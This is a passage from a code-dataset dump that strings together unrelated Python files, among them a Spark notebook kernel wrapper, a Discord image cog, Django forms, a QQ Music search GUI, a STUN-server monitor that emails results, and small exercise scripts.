do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n if self._fatal_error is not None:\n self._repeat_fatal_error()\n\n # Parse command\n subcommand, force, output_var, command = self.user_command_parser.parse_user_command(code)\n\n # Get transformer\n transformer = self._get_code_transformer(subcommand)\n\n # Get instructions\n try:\n code_to_run, error_to_show, begin_action, end_action, deletes_session = \\\n transformer.get_code_to_execute(self._session_started, self.connection_string,\n force, output_var, command)\n except SyntaxError as se:\n self._show_user_error(\"{}\".format(se))\n else:\n # Execute instructions\n if error_to_show is not None:\n self._show_user_error(error_to_show)\n return self._execute_cell(code_to_run, silent, store_history, user_expressions, allow_stdin)\n\n if begin_action == Constants.delete_session_action:\n self._delete_session()\n elif begin_action == Constants.start_session_action:\n self._start_session()\n elif begin_action == Constants.do_nothing_action:\n pass\n else:\n raise ValueError(\"Begin action {} not supported.\".format(begin_action))\n\n res = self._execute_cell(code_to_run, silent, store_history, user_expressions, allow_stdin)\n\n if end_action == Constants.delete_session_action:\n self._delete_session()\n elif end_action == Constants.start_session_action:\n self._start_session()\n elif end_action == Constants.do_nothing_action:\n pass\n else:\n raise ValueError(\"End action {} not supported.\".format(end_action))\n\n if deletes_session:\n self._session_started = False\n\n return res\n\n return self._execute_cell(\"\", silent, store_history, user_expressions, allow_stdin)\n\n def do_shutdown(self, restart):\n # Cleanup\n self._delete_session()\n\n return self._do_shutdown_ipykernel(restart)\n\n @staticmethod\n def _get_code_transformer(subcommand):\n if subcommand == UserCommandParser.run_command:\n return SparkTransformer(subcommand)\n elif subcommand == UserCommandParser.sql_command:\n return SqlTransformer(subcommand)\n elif subcommand == UserCommandParser.hive_command:\n return HiveTransformer(subcommand)\n elif subcommand == UserCommandParser.config_command:\n 
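# (comment added for clarity, not in the original) each parsed subcommand maps to a dedicated transformer object that produces the code and session actions to run\n            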
return ConfigTransformer(subcommand)\n elif subcommand == UserCommandParser.info_command:\n return InfoTransformer(subcommand)\n elif subcommand == UserCommandParser.delete_command:\n return DeleteSessionTransformer(subcommand)\n elif subcommand == UserCommandParser.clean_up_command:\n return CleanUpTransformer(subcommand)\n elif subcommand == UserCommandParser.logs_command:\n return LogsTransformer(subcommand)\n elif subcommand == UserCommandParser.local_command:\n return PythonTransformer(subcommand)\n else:\n return NotSupportedTransformer(subcommand)\n\n def _load_magics_extension(self):\n register_magics_code = \"%load_ext remotespark\"\n self._execute_cell(register_magics_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to load the Spark magics library.\")\n self._logger.debug(\"Loaded magics.\")\n\n def _register_auto_viz(self):\n register_auto_viz_code = \"\"\"from remotespark.datawidgets.utils import display_dataframe\nip = get_ipython()\nip.display_formatter.ipython_display_formatter.for_type_by_name('pandas.core.frame', 'DataFrame', display_dataframe)\"\"\"\n self._execute_cell(register_auto_viz_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to register auto viz for notebook.\")\n self._logger.debug(\"Registered auto viz.\")\n\n def _start_session(self):\n if not self._session_started:\n self._session_started = True\n\n add_session_code = \"%spark add {} {} {} skip\".format(\n self.client_name, self.session_language, self.connection_string)\n self._execute_cell(add_session_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to create a Livy session.\")\n self._logger.debug(\"Added session.\")\n\n def _delete_session(self):\n if self._session_started:\n code = \"%spark cleanup\"\n self._execute_cell_for_user(code, True, False)\n self._session_started = False\n\n def _get_configuration(self):\n \"\"\"Returns (username, password, url). 
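(Note added for clarity: the values come from the user configuration entry named 'kernel_' + kernel_conf_name + '_credentials'.) 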
If there is an error (missing configuration),\n returns False.\"\"\"\n try:\n credentials = getattr(conf, 'kernel_' + self.kernel_conf_name + '_credentials')()\n ret = (credentials['username'], credentials['password'], credentials['url'])\n\n # The URL has to be set in the configuration.\n assert(ret[2])\n\n return ret\n except (KeyError, AssertionError):\n message = \"Please set configuration for 'kernel_{}_credentials' to initialize Kernel\".format(\n self.kernel_conf_name)\n self._queue_fatal_error(message)\n return False\n\n def _execute_cell(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False,\n shutdown_if_error=False, log_if_error=None):\n reply_content = self._execute_cell_for_user(code, silent, store_history, user_expressions, allow_stdin)\n\n if shutdown_if_error and reply_content[u\"status\"] == u\"error\":\n error_from_reply = reply_content[u\"evalue\"]\n if log_if_error is not None:\n message = \"{}\\nException details:\\n\\t\\\"{}\\\"\".format(log_if_error, error_from_reply)\n self._abort_with_fatal_error(message)\n\n return reply_content\n\n def _execute_cell_for_user(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n return super(SparkKernelBase, self).do_execute(code, silent, store_history, user_expressions, allow_stdin)\n\n def _do_shutdown_ipykernel(self, restart):\n return super(SparkKernelBase, self).do_shutdown(restart)\n\n def _show_user_error(self, message):\n self._logger.error(message)\n self._ipython_display.send_error(message)\n\n def _queue_fatal_error(self, message):\n \"\"\"Queues up a fatal error to be thrown when the next cell is executed; does not\n raise an error immediately. We use this for errors that happen on kernel startup,\n since IPython crashes if we throw an exception in the __init__ method.\"\"\"\n self._fatal_error = message\n\n def _abort_with_fatal_error(self, message):\n \"\"\"Queues up a fatal error and throws it immediately.\"\"\"\n self._queue_fatal_error(message)\n self._repeat_fatal_error()\n\n def _repeat_fatal_error(self):\n \"\"\"Throws an error that has already been queued.\"\"\"\n error = conf.fatal_error_suggestion().format(self._fatal_error)\n self._logger.error(error)\n self._ipython_display.send_error(error)\n raise ValueError(self._fatal_error)\n","sub_path":"remotespark/wrapperkernel/sparkkernelbase.py","file_name":"sparkkernelbase.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"551821624","text":"import discord\r\nfrom discord.ext import commands\r\nfrom .utils.dataIO import fileIO\r\nfrom .utils.dataIO import dataIO\r\nfrom .utils import checks\r\nimport asyncio\r\nimport textwrap\r\nimport os\r\nimport math\r\nimport aiohttp\r\nfrom copy import copy\r\n\r\ntry:\r\n from PIL import Image, ImageDraw, ImageFont, ImageColor\r\n\r\n pil_available = True\r\nexcept:\r\n pil_available = False\r\n\r\n\r\nclass rip:\r\n \"\"\"rest in pieces\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.drawing_settings = fileIO(\"data/rip/settings.json\", \"load\")\r\n\r\n @commands.command(pass_context=True)\r\n async def rip(self, ctx, user: discord.Member=None):\r\n \"\"\"rip \"\"\"\r\n text = \"Rest in Peace,\\n {}\".format(user.name)\r\n text2 = user.name\r\n result = Image.open('data/rip/stone.jpg').convert('RGBA')\r\n process = Image.new('RGBA', (833, 576), (0, 0, 0))\r\n fnt = ImageFont.truetype('data/rip/animeace.otf', 45)\r\n fnt_sm = 
ImageFont.truetype('data/rip/animeinept.otf', 40)\r\n        d = ImageDraw.Draw(process)\r\n        sign = user.name\r\n        author_width = fnt_sm.getsize(\"— \" + sign)[0]\r\n        d.rectangle([(0, 0), (833, 576)], fill=(0, 0, 0, 0))\r\n        d.text((140, 200), text, font=fnt, fill=\"#2f3642\")\r\n        #d.rectangle((25, 25), ava)\r\n        #d.text((200 - author_width - 25, 65), \"— \" + sign, font=fnt_sm, fill=\"#000000\")\r\n        #d.rectangle([(10, 10), (390, 90)], fill=None, outline=(200, 200, 200, 128))\r\n        result = Image.alpha_composite(result, process)\r\n        result.save('data/rip/temp.png', 'PNG', quality=100)\r\n        await self.bot.send_file(ctx.message.channel, 'data/rip/temp.png')\r\n        os.remove('data/rip/temp.png')\r\n\r\ndef setup(bot):\r\n    # check_folders()\r\n    # check_files()\r\n    n = rip(bot)\r\n    bot.add_cog(n)","sub_path":"rip.py","file_name":"rip.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"647021194","text":"from django import forms\n\nfrom .models import Weeklyschedule, ScheduledTime\n\nclass WeeklyscheduleForm(forms.ModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(WeeklyscheduleForm, self).__init__(*args, **kwargs)\n\t\tself.fields['sid'].widget.attrs['readonly'] = True\n\tclass Meta:\n\t\tmodel = Weeklyschedule\n\t\tfields = [\n\t\t'id',\n\t\t'sid'\n\t\t]\n\nclass ScheduledTimeForm(forms.Form):\n\tdate = forms.DateField()\n\tstarttime = forms.TimeField()\n\tendtime = forms.TimeField()\n\tnotes = forms.CharField(required=False)\n\nclass ScheduledTimeModelForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = ScheduledTime\n\t\tfields = [\n\t\t'wid',\n\t\t'date',\n\t\t'starttime',\n\t\t'endtime',\n\t\t'notes'\n\t\t]\n\t\n","sub_path":"304env/src/DASHospital/WeeklySchedule/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407091341","text":"\"\"\"\r\nSimulates ZOJ1115.\r\nDESCRIPTION: like the narcissistic-number exercises, this computes a digital root: keep adding the digits together until a single-digit integer remains.\r\n(Docstring translated from Chinese.)\r\n\"\"\"\r\ndef func(n):\r\n    sum = 0\r\n    while n != 0:\r\n        sum += n % 10\r\n        n //= 10  # integer division; the original n /= 10 never terminates cleanly under Python 3\r\n    if sum > 9:\r\n        return func(sum)\r\n    else:\r\n        return sum\r\n\r\n\r\nif __name__ == '__main__':\r\n    while True:\r\n        n = int(input())\r\n        if n == 0:\r\n            break\r\n        print(func(n))\r\n\"\"\"\r\n24\r\n36\r\n0\r\n\r\n6\r\n3\r\n\"\"\"","sub_path":"水题_zoj1115.py","file_name":"水题_zoj1115.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"490226379","text":"#!/usr/bin/python\n\nimport pandas as pd\n\ncountries = pd.read_csv('../../country_names.csv')\ncountries = countries.set_index('country_code')\n\noutf = open('load_disease_burden.py', 'a')\n\noutf.write(\"\\n\")\nfor code in countries.index:\n\toutf.write(\"\\t\\t\\tdisease_burden.\"+code+\" = df.loc[index, '\"+code+\"']\\n\")\n\noutf.write(\"\\t\\t\\t#don't forget to save\\n\")\noutf.write(\"\\t\\t\\tdisease_burden.save()\\n\")\noutf.close()\n","sub_path":"djangos/mysite/disease/management/commands/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240987652","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*- \n\nfrom tkinter import *\nimport tkinter.messagebox as messagebox\n\nimport urllib.request \nimport socket \nimport re \nimport sys \nimport os \nimport io\nimport time\nimport pymssql\nimport json\n\nclass Application:\n\n    
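\"\"\"Tkinter front end: a keyword entry, a result Listbox and a download button. (Docstring added for clarity; it is not part of the original file.)\"\"\"\n\n    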
def __init__(self,Root):\n        self.root=Root\n        def printList():\n            items=[]\n            for i in listbox.curselection():\n                items.append(sUrl[i])\n            messagebox.showinfo('Message', 'Downloading, %s' % items)\n        value=StringVar()\n        listbox = Listbox(self.root,listvariable=value,selectmode=EXTENDED)\n        download=Button(self.root,text='Download selected',command=printList)\n        listbox.grid(row=1,columnspan =3,sticky=\"nsew\")\n        download.grid(row=2,columnspan=3,sticky=\"nsew\")\n        sSong=[]\n        sUrl=[] \n\n        \n        def doSearch(keyword):\n            regex='(.+?)[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|](.+?)[|].+?[|](.+?)[|].+?[|].+?'\n            keyword=urllib.parse.quote(keyword)\n            page=1\n            size=10\n            QQ='0'\n            url='http://s.music.qq.com/fcgi-bin/music_search_new_platform?t=0&n={2}&aggr=1&cr=1&loginUin={3}&format=json&inCharset=GB2312&outCharset=utf-8&notice=0&platform=jqminiframe.json&needNewCode=0&p={1}&catZhida=0&remoteplace=sizer.newclient.next_song&w={0}'.format(keyword,page,size,QQ)\n            request = urllib.request.Request(url)\n            response =urllib.request.urlopen(request)\n            response=response.read().decode('utf-8')\n            jsonResult=json.loads(response)\n            songTotalnum=jsonResult['data']['song']['totalnum']\n            nowSize=len(jsonResult['data']['song']['list'])\n            for i in range(0,nowSize):\n                getSongs(i,jsonResult,regex)\n\n        def getSongs(i,jsonResult,regex):\n\n            item=jsonResult['data']['song']['list'][i]\n            songF=item['f']\n            songAlbum=item['albumName_hilight']\n            songSinger=item['fsinger']\n            songName=item['fsong']\n\n            res = re.findall(regex,songF) \n\n            print(res)\n            fid=res[0][1]\n            fimg=res[0][2]\n            firc=res[0][0]\n            songUrl='http://cc.stream.qqmusic.qq.com/C200{0}.m4a?vkey=3E97AE28D0DE7EE118A4405D75CE205A58047409A2AFB84C3B928377F696B539DBC4B239D0353DD42D5298CEBD0ADC16F53DE99D3EDBA47B&guid=3587763272&fromtag=30'.format(fid)\n\n            sSong.append(songName+' - '+songSinger)\n            sUrl.append(songUrl)\n            value.set(sSong)\n\n        def btnSearch_Click():\n            if(textKeyword.get().strip()!=''):\n                doSearch(textKeyword.get().strip())\n\n        lblKeyword=Label(self.root,text='Enter keyword')\n        textKeyword=Entry(self.root) \n        btnSearch=Button(self.root,text='Search',command=btnSearch_Click) \n        # btnSearch=Button(self.root,text='Search',command=lambda:btnSearch_Click(textKeyword.get().strip()))\n\n        lblKeyword.grid(row=0,column=0)\n        textKeyword.grid(row=0,column=1)\n        btnSearch.grid(row=0,column=2)\n        \n\nclass GuiMenu():\n    def hello(self):\n        pass\n    def File(self):\n        pass\n    def Edit(self):\n        pass\n    def View(self):\n        pass\n    def Help(self):\n        pass\n    \n    def __init__(self,Root):\n        self.root=Root\n        self.menubar=Menu(Root)\n        # create a pulldown menu, and add it to the menu bar\n        filemenu = Menu(self.menubar, tearoff=0)\n        filemenu.add_command(label=\"Open\", command=self.File)\n        filemenu.add_command(label=\"New\", command=self.File)\n        filemenu.add_command(label=\"Save\", command=self.File)\n        filemenu.add_separator()\n        filemenu.add_command(label=\"Exit\", command=Root.quit)\n        self.menubar.add_cascade(label=\"File\", menu=filemenu)\n        # create more pulldown menus\n        editmenu = Menu(self.menubar, tearoff=0)\n        editmenu.add_command(label=\"Cut\", command=self.Edit)\n        editmenu.add_command(label=\"Copy\", command=self.Edit)\n        editmenu.add_command(label=\"Paste\", command=self.Edit)\n        self.menubar.add_cascade(label=\"Edit\", menu=editmenu)\n        helpmenu = Menu(self.menubar,tearoff=0)\n        helpmenu.add_command(label=\"About\", command=self.Help)\n        self.menubar.add_cascade(label=\"Help\", menu=helpmenu)\n        Root.config(menu=self.menubar)\n\n        \n        \n\n
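# --- Added sketch (not in the original file): a standalone illustration of how\n# Application.doSearch() above builds its query URL. The function and parameter\n# names here are chosen for illustration only; the endpoint and query template\n# are copied verbatim from the original string.\ndef build_search_url(keyword, page=1, size=10, qq='0'):\n    import urllib.parse\n    base = 'http://s.music.qq.com/fcgi-bin/music_search_new_platform'\n    query = ('?t=0&n={2}&aggr=1&cr=1&loginUin={3}&format=json&inCharset=GB2312'\n             '&outCharset=utf-8&notice=0&platform=jqminiframe.json&needNewCode=0'\n             '&p={1}&catZhida=0&remoteplace=sizer.newclient.next_song&w={0}')\n    return base + query.format(urllib.parse.quote(keyword), page, size, qq)\n\n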
def main():\n    root = Tk()\n    root.geometry('600x400')\n    root.title('QQmusic')\n    GuiMenu(root)\n    Application(root)\n    mainloop()\n\nif __name__ == '__main__':\n    main()","sub_path":"QQmusic/QQmusicNew.py","file_name":"QQmusicNew.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"515027162","text":"#!/usr/bin/env python3\nimport smtplib\nfrom email.mime.text import MIMEText\nimport os\nimport json\nimport argparse\n\ndef parse_command_line():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('exe_path', action='store', type=str, help='Path to executable file')\n\tparser.add_argument('config_path', action='store', type=str, help='Path to the executable configuration file')\n\tparser.add_argument('result_old_path', action='store', type=str, help='Path to old file with results')\n\tparser.add_argument('result_new_path', action='store', type=str, help='Path to new file with results')\n\tparser.add_argument('error_log_path', action='store', type=str, help='Path to error log')\n\n\tparser.add_argument('from_address', action='store', type=str, help='Mail from which the message will be sent')\n\tparser.add_argument('to_address', action='store', type=str, help='Mail to which the message will be sent')\n\n\targs=parser.parse_args()\n\n\tdata= args.exe_path, args.config_path, args.result_old_path, args.result_new_path, args.error_log_path, args.from_address, args.to_address\n\n\treturn data\n\ndef send_message(message, from_address, to_address):\n\tmsg=initialization_message(message, from_address, to_address)\n\n\ts = smtplib.SMTP('localhost')\n\ts.sendmail(from_address, [to_address], msg.as_string())\n\ts.quit()\n\ndef initialization_message(message, from_address, to_address):\n\tmsg=MIMEText(message,'plain','utf-8')\n\tmsg['Subject'] = 'stun_monitor'\n\tmsg['From'] = from_address\n\tmsg['To'] = to_address\n\n\treturn msg\n\ndef get_str_file(file):\n\ttext = ''\n\tif os.path.exists(file):\n\t\twith open(file) as data:\n\t\t\ttext = data.read()\n\telse:\n\t\treturn False\n\treturn text\n\ndef get_json(file):\n\tdata=''\n\tif os.path.exists(file):\n\t\ttry:\n\t\t\twith open(file) as json_data:\n\t\t\t\tdata = json.load(json_data)\n\t\texcept ValueError:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\treturn data\n\nclass data_analyzer:\n\tdef __init__(self, _executable_file, _config_path, _result_new, _result_old, _error_log):\n\t\tself.__executable_file = _executable_file\n\t\tself.__config_path = _config_path\n\t\tself.__result_new = _result_new\n\t\tself.__result_old = _result_old\n\t\tself.__error_log = _error_log\n\n\t\tif os.path.exists(_result_new):\n\t\t\tos.remove(_result_new)\n\t\tself.__command='./' + _executable_file + ' ' + '--config_path=' + _config_path + \\\n\t\t\t' ' + '--record_path=' + _result_new + ' ' + '2>' + _error_log\n\n\tdef start_data_analysis(self):\n\t\tmessage = ''\n\n\t\tif os.system(self.__command) == 0:\n\t\t\tif os.path.exists(self.__result_old):\n\t\t\t\tmessage=self.__data_analysis__()\n\t\t\tself.__end_of_analysis__()\n\t\telse:\n\t\t\tmessage='Monitor errors log: ' + get_str_file(self.__error_log)\n\t\treturn message\n\n\tdef __end_of_analysis__(self):\n\t\tif os.path.exists(self.__result_old):\n\t\t\tos.remove(self.__result_old)\n\t\tos.rename(self.__result_new, self.__result_old)  # was relying on module-level globals instead of the instance paths\n\n\tdef __data_analysis__(self):\n\t\tdata_old = get_json(self.__result_old)\n\t\tdata_new = get_json(self.__result_new)\n\t\tmessage = ''\n\n\t\tif data_old == False or data_new == False:  # the second operand previously re-tested data_old by copy-paste\n\t\t\tmessage = 
'data_analysis.py: Could not open ' + self.__result_old\n\t\t\tmessage += ' or ' + self.__result_new\n\t\t\treturn message\n\t\t\t\n\t\tinvalid_servers=''\n\n\t\ttry:\n\t\t\tfor itnew in data_new[\"Servers\"]:\n\t\t\t\tif itnew[\"IsActive\"] == 'No':\n\t\t\t\t\tfor itold in data_old[\"Servers\"]:\n\t\t\t\t\t\tif itnew[\"IP\"] == itold[\"IP\"] and itold[\"IsActive\"] == 'No':\n\t\t\t\t\t\t\tinvalid_servers+=itnew[\"IP\"]+'\\n'\n\n\t\t\tif invalid_servers:\n\t\t\t\tmessage='Non-working servers:\\n'+invalid_servers\n\n\t\texcept KeyError:\n\t\t\tmessage='data_analysis.py: Invalid monitoring result'\n\n\t\treturn message\n\n\ndata = parse_command_line()\nif data:\n\texe_path = data[0]\n\tconfig_path = data[1]\n\tresult_old = data[2]\n\tresult_new = data[3]\n\terror_log = data[4]\n\t\n\tfrom_address = data[5]\n\tto_address = data[6]\n\n\tanalyzer = data_analyzer(exe_path, config_path, result_new, result_old, error_log)\n\tmessage = analyzer.start_data_analysis()\n\n\tif message:\n\t\tsend_message(message, from_address, to_address)\nelse:\n\tprint('script.py: Could not parse command line')","sub_path":"source/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389887797","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\nimport copy\nchf = FontProperties(fname=r\"c:\\windows\\fonts\\msjhbd.ttc\", size=14)\n\n# 參數區--------------------\n# 一般\n_每月薪水 = 3\n_每月開銷 = 1 # 不含房租\n_每月房租 = 1\n_每月孝親 = 0\n_退休年齡 = 60\n_年薪月數 = 12\n# 投資\n_投資部位 = 0.7\n_投資年利率 = 5\n_投資資金 = 20\n_投資年紀 = 25\n# 買房\n_買房價格 = 300\n_買房頭期款 = 100\n_買房年紀 = 40\n_房貸利率 = 2.4\n_貸款年數 = 20\n# 系統\n_預測時段 = range(_投資年紀, 90, 1)\n__空時間軸___ = pd.Series(0, index=_預測時段) # 劃出每年金額皆為0的資產線\n\n# 程式區--------------------\n# 複利計算方程式\ndef compound_interest(arr, ratio, return_rate):\n ret = [arr.iloc[0]]\n for v in arr[1:]: # 從第二年開始算\n # 投資金額 * _投資年利率 + 存在帳戶裡不動的錢\n ret.append(ret[-1] * ratio * # 前一年的淨額 * _投資部位=投資金額\n (return_rate/100+1) + # _投資年利率\n ret[-1] * (1 - ratio) + v) # 存在帳戶裡不動的錢\n return pd.Series(ret, _預測時段) # 轉年分\n\n\n# 投資--------------------\n每年淨額 = copy.copy(__空時間軸___)\n每年淨額.loc[_投資年紀] += _投資資金\n每年淨額.loc[:_退休年齡] += _每月薪水 * _年薪月數 # 填滿年薪\n每年淨額 -= (_每月開銷+_每月房租 + _每月孝親)*12 # 填滿開銷\n不作為_財富累積 = 每年淨額.cumsum()\n\n只投資_財富累積 = compound_interest(每年淨額, _投資部位, _投資年利率)\n\n# 買房--------------------\n# 1.每年還款本金\n買房支出 = copy.copy(__空時間軸___)\n買房支出[_買房年紀] = _買房頭期款\n買房支出.loc[_買房年紀:_買房年紀+_貸款年數-1] += (_買房價格 - _買房頭期款) / _貸款年數\n# 欠款\n欠款 = copy.copy(__空時間軸___)\n欠款[_買房年紀] = _買房價格\n欠款 = 欠款.cumsum()\n欠款 = 欠款 - 買房支出.cumsum()\n# 2.每年還款利息\n# 為了結算去年利息,用Shift往後移一年,可計算出每年當年的利息\n利息 = 欠款.shift().fillna(0) * _房貸利率 / 100\n# 3.購屋前房租\n房租年繳 = pd.Series(_每月房租*12, index=_預測時段)\n房租年繳.loc[_買房年紀:] = 0\n只買房_逐年收支 = copy.copy(__空時間軸___)\n只買房_逐年收支.iloc[0] = _投資資金\n只買房_逐年收支.loc[:_退休年齡] += _每月薪水 * 12\n只買房_逐年收支 -= (_每月開銷*12 + 房租年繳 + 利息 + 買房支出)\n只買房_財富累積=只買房_逐年收支.cumsum()\n投資加買房_財富累積 = compound_interest(只買房_逐年收支, _投資部位, _投資年利率)\n# 4.繪圖\nplt.plot(不作為_財富累積, color='black', label='不作為') # 放入各點X,Y,顏色,名字\nplt.plot(只投資_財富累積, color='yellow', label='只投資') # 放入各點X,Y,顏色,名字\nplt.plot(只買房_財富累積, color='red', label='只買房') # 放入各點X,Y,顏色,名字\nplt.plot(投資加買房_財富累積, color='blue', label='投資加買房') # 放入各點X,Y,顏色,名字\n# plt.plot(買房支出, color='yellow', label='InvestOnly') # 放入各點X,Y,顏色,名字\n# plt.plot(欠款, color='yellow', label='InvestOnly') # 放入各點X,Y,顏色,名字\n# plt.plot(利息, color='yellow', label='InvestOnly') # 
plot the points X, Y with color and label (translated)\nplt.title('Comparison chart', fontproperties=chf)\nplt.xlabel('Age', fontproperties=chf)\nplt.ylabel('10,000 dollars', fontproperties=chf)\nplt.legend(loc='best', prop=chf) # place the legend automatically","sub_path":"Python課程/用Python理財_打造小資族選股策略/Brad股價爬蟲/人生財務曲線_Brad.py","file_name":"人生財務曲線_Brad.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"104367632","text":"# Write a function that takes a number from 1 to 100 as input.\r\n# If the number equals 13 the function raises a ValueError,\r\n# otherwise it returns the entered number squared.\r\n# Then write the main program: the user enters a number,\r\n# the number is passed to the function and the returned result is printed.\r\n# Handle the exception that may be raised inside the function.\r\n# (Comments and user-facing strings translated from Russian.)\r\n\r\nimport random\r\n\r\n\r\ndef my_func(x):\r\n    if x not in range(1, 101) or x == 13:\r\n        raise ValueError\r\n    else:\r\n        return x ** 2\r\n\r\n\r\n# print(my_func(13))\r\n\r\ntry:\r\n    print(my_func(int(input('Enter a number from 1 to 100. Do not use 13! >>>'))))\r\nexcept ValueError:\r\n    print('You entered a number outside the range or used 13!')\r\n","sub_path":"video_course/lesson_14_4.py","file_name":"lesson_14_4.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36425338","text":"import bisect\n\n\nclass Solution:\n    def maxTotalFruits(self, fruits, startPos: int, k: int) -> int:\n        n = len(fruits)\n        MAX_INT = float(\"inf\")\n        pre = [0]\n        for i in range(n):\n            pre.append(pre[-1] + fruits[i][1])\n        res = 0\n        for i in range(k + 1):\n            left = bisect.bisect_left(fruits, [startPos - i, 0])\n            right = bisect.bisect_right(fruits, [startPos + max(k - 2 * i, 0), MAX_INT])\n            res = max(res, pre[right] - pre[left])\n            left = bisect.bisect_left(fruits, [startPos - max(k - 2 * i, 0), 0])\n            right = bisect.bisect_right(fruits, [startPos + i, MAX_INT])\n            res = max(res, pre[right] - pre[left])\n        return res\n\n\ns = Solution()\nprint(s.maxTotalFruits(\n    [[0, 7], [7, 4], [9, 10], [12, 6], [14, 8], [16, 5], [17, 8], [19, 4], [20, 1], [21, 3], [24, 3], [25, 3], [26, 1],\n     [28, 10], [30, 9], [31, 6], [32, 1], [37, 5], [40, 9]],\n    21,\n    30))\n# print(s.maxTotalFruits([[200000, 10000]], 200000, 0))\n# print(s.maxTotalFruits([[0, 9], [4, 1], [5, 7], [6, 2], [7, 4], [10, 9]], 5, 4))\n","sub_path":"leetcode/2021/contest/weekly-271/Contest4.py","file_name":"Contest4.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24960302","text":"import enum\nfrom sqlalchemy import Column, BigInteger, Integer, String, Table,\\\n    Enum, DateTime, ForeignKey\nfrom models import Base\n\n\nclass OrgStatus(enum.IntEnum):\n    Active = 1\n    Locked = 2\n    Removed = 3\n\n\nclass OrgType(enum.IntEnum):\n    GroupCompany = 0\n    Company = 1\n    Branch = 2\n    Department = 3\n\n\norganizations = Table('cms_organizations', Base.metadata,\n                      Column('id', BigInteger, primary_key=True),\n                      Column('code', String(20), nullable=False),\n                      Column('name', String(256), nullable=False),\n                      Column('short_name', String(64)),\n                      Column('org_type', Enum(OrgType), default=OrgType.Department),\n                      Column('telephone', String(32)),\n                      Column('mobilephone', String(32)),\n                      Column('fax', String(32)),\n                      Column('email', String(64)),\n                      Column('province', String(32)),\n                      Column('city', 
String(32)),\n Column('postcode', String(32)),\n Column('address', String(256)),\n Column('memo', String(512)),\n Column('parent_id', None, ForeignKey('cms_organizations.id',\n ondelete=\"set null\")),\n Column('location_id', None, ForeignKey('cms_locations.id')),\n Column('org_order', Integer, default=1),\n Column('status', Enum(OrgStatus), default=OrgStatus.Active),\n Column('created_date', DateTime, nullable=False),\n Column('last_modifed', DateTime)\n)\n","sub_path":"models/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"116945230","text":"# 고민해보자...\n\nimport sys\n\nsys.stdin = open('input.txt', 'r')\n\n\ndef calc_process(convert_stack):\n calc_stack = []\n\n try:\n\n while len(convert_stack) != 0:\n popped = convert_stack.pop()\n\n if popped == '*':\n num1 = calc_stack.pop()\n num2 = calc_stack.pop()\n popped = num1 * num2\n\n elif popped == '+':\n num1 = calc_stack.pop()\n num2 = calc_stack.pop()\n popped = num1 + num2\n\n calc_stack.append(popped)\n\n except:\n return None\n\n result = calc_stack[0]\n\n return result\n\n\ndef bracket_process(brackets):\n bracket_stack = []\n convert_stack = []\n\n bracket_stack.append(brackets[0])\n\n prev = brackets[0]\n\n total = 0\n\n for bracket in brackets[1:]:\n\n if len(bracket_stack) == 0:\n\n calc_result = calc_process(convert_stack)\n\n if calc_result:\n total += calc_result\n else:\n return 0\n\n convert_stack = []\n\n # 이후 푸시\n if bracket == '(' or bracket == '[':\n bracket_stack.append(bracket)\n else:\n return 0\n else:\n if bracket == '(' or bracket == '[':\n bracket_stack.append(bracket)\n\n if prev in ['(', '[']:\n convert_stack.append('*')\n elif prev in [')', ']']:\n convert_stack.append('+')\n else:\n popped = bracket_stack.pop()\n\n if popped == '(' and bracket == ')':\n convert_stack.append(2)\n elif popped == '[' and bracket == ']':\n convert_stack.append(3)\n else:\n return 0\n\n prev = bracket\n\n if len(bracket_stack) != 0:\n return 0\n\n calc_result = calc_process(convert_stack)\n\n if calc_result:\n total += calc_result\n else:\n return 0\n\n return total\n\n\nbrackets = list(input())\n\nprint(bracket_process(brackets))\n","sub_path":"PYTHON/BAEKJOON/2504_괄호의_값/2504.py","file_name":"2504.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380424404","text":"import os\nimport json\nimport numpy as np\nfrom collections import OrderedDict\n\nimport rlcard\n\nfrom rlcard.games.karma.card import KarmaCard as 